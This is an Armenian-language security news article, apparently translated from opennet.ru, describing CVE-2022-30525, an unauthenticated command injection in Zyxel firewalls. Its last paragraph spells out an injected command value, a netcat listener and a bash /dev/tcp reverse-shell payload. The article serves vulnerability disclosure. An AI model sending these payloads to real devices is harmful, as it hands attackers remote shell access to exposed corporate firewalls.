Zyxel firewalls-ի խոցելիությունը, որը թույլ է տալիս կոդի կատարումն առանց նույնականացման

Կրիտիկական խոցելիություն (CVE-2022-30525) հայտնաբերվել է ATP, VPN և USG FLEX սերիաների Zyxel սարքերում, որոնք նախատեսված են ձեռնարկություններում firewalls-ի, IDS-ի և VPN-ի աշխատանքը կազմակերպելու համար, ինչը թույլ է տալիս արտաքին հարձակվողին գործարկել կոդը սարք առանց օգտատիրոջ իրավունքների՝ առանց նույնականացման: Հարձակում իրականացնելու համար հարձակվողը պետք է կարողանա հարցումներ ուղարկել սարքին՝ օգտագործելով HTTP/HTTPS արձանագրությունը: Zyxel-ը շտկել է ZLD 5.30 որոնվածի թարմացման խոցելիությունը։ Ըստ Shodan ծառայության տվյալների՝ ներկայումս համաշխարհային ցանցում կա 16213 պոտենցիալ խոցելի սարք, որոնք ընդունում են հարցումները HTTP/HTTPS-ի միջոցով:

Գործողությունն իրականացվում է հատուկ մշակված հրամաններ ուղարկելով վեբ մշակող /ztp/cgi-bin/handler-ին, որը հասանելի է առանց նույնականացման: Խնդիրն առաջանում է հարցումի պարամետրերի պատշաճ մաքրման բացակայության պատճառով, երբ համակարգում հրամաններ ենք կատարում՝ օգտագործելով lib_wan_settings.py գրադարանում օգտագործվող os.system կանչը և իրականացվում է setWanPortSt գործողությունը մշակելիս:

Օրինակ, հարձակվողը կարող է անցնել «; ping 192.168.1.210;" ինչը կհանգեցնի համակարգի վրա «ping 192.168.1.210» հրամանի կատարմանը: Հրամանի պատյան մուտք գործելու համար կարող եք գործարկել «nc -lvnp 1270» ձեր համակարգում, այնուհետև սկսել հակադարձ միացում՝ սարքին հարցում ուղարկելով «; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;’:

Source: opennet.ru

Добавить комментарий